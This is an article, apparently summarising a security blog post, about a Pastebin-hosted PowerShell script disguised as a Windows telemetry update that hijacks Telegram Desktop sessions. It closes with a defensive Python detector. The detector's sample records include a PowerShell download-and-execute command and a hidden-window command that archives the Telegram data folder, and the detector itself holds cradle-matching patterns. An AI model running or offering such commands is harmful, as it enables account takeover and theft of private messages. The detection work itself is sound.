Cybercriminals are using a novel method to hijack Telegram sessions: a PowerShell script hosted on Pastebin and disguised as a Windows telemetry update. Because the script sits in plain text on a public paste site, it gives cybersecurity professionals a rare chance to observe how such a tool is built and tested.
Unlike traditional malware that often seeks to extract passwords or browser credentials, this particular script is designed specifically to target Telegram's desktop client data. By focusing solely on session data, the attackers can potentially gain unauthorized access to Telegram accounts without needing to compromise other sensitive information.
Hosting the script on Pastebin, a popular text storage site, makes it easy to distribute and retrieve. The delivery method also helps it evade traditional security controls, which may not flag the download or execution as suspicious because the script presents itself as a legitimate Windows telemetry update.
The impact of this attack vector is significant for users of Telegram’s desktop client, as it could lead to unauthorized access to private communications and data. This highlights the ongoing need for vigilance and robust security practices among users of messaging platforms.
To mitigate the risk of such attacks, users should be cautious of unexpected updates and verify the authenticity of any scripts before executing them. Employing comprehensive security solutions and staying informed about emerging threats can also help protect against session hijacking attempts.
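As an added defender-side illustration (not code from the Flare post or from the script it analyzes), the following Python triage routine flags process-creation records that match the pattern described above: PowerShell pulling a raw Pastebin paste through a download cradle, running with a hidden window, or referencing the Telegram Desktop data folder. The log records, the paste ID and the Telegram Desktop path are constructed or assumed for the example.

```python
import re

# Constructed process-creation records (not taken from the original post).
# The paste ID is a placeholder; the Telegram Desktop folder name is assumed.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command '
                '"IEX (New-Object Net.WebClient).DownloadString('
                '\'https://pastebin.com/raw/PLACEHOLDER\')"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"image": r"C:\Program Files\Telegram Desktop\Telegram.exe",
     "cmdline": "Telegram.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "Compress-Archive -Path '
                '\'$env:APPDATA\\Telegram Desktop\' '
                '-DestinationPath $env:TEMP\\telemetry_update.zip"'},
]

# Image name ending in powershell.exe / pwsh.exe (Windows or PowerShell Core).
POWERSHELL = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", re.I)
# Raw paste URL, the form a script would fetch for direct execution.
PASTEBIN_RAW = re.compile(r"https?://(?:www\.)?pastebin\.com/raw/\S+", re.I)
# Common in-memory download-and-run cradles.
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:IEX|Invoke-Expression|DownloadString|Invoke-WebRequest|iwr|"
    r"Invoke-RestMethod|irm)\b", re.I)
# Hidden console window, a frequent trait of scripts posing as background updates.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)
# Reference to the Telegram Desktop per-user data folder (assumed name).
TELEGRAM_DATA = re.compile(r"Telegram Desktop", re.I)


def classify(event):
    """Return the list of indicator tags matched by one process-creation record."""
    tags = []
    if not POWERSHELL.search(event["image"]):
        return tags                      # only PowerShell launches are in scope
    cmd = event["cmdline"]
    if PASTEBIN_RAW.search(cmd):
        tags.append("pastebin_fetch")
    if DOWNLOAD_CRADLE.search(cmd):
        tags.append("download_cradle")
    if HIDDEN_WINDOW.search(cmd):
        tags.append("hidden_window")
    if TELEGRAM_DATA.search(cmd):
        tags.append("telegram_data_access")
    return tags


def find_suspicious(events):
    """Return (index, tags) for every record that matched at least one indicator."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```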
Source: https://flare.io/learn/resources/blog/telegram-session-stealerpastebin-hosted-powershell-script-targets-desktop-web-sessions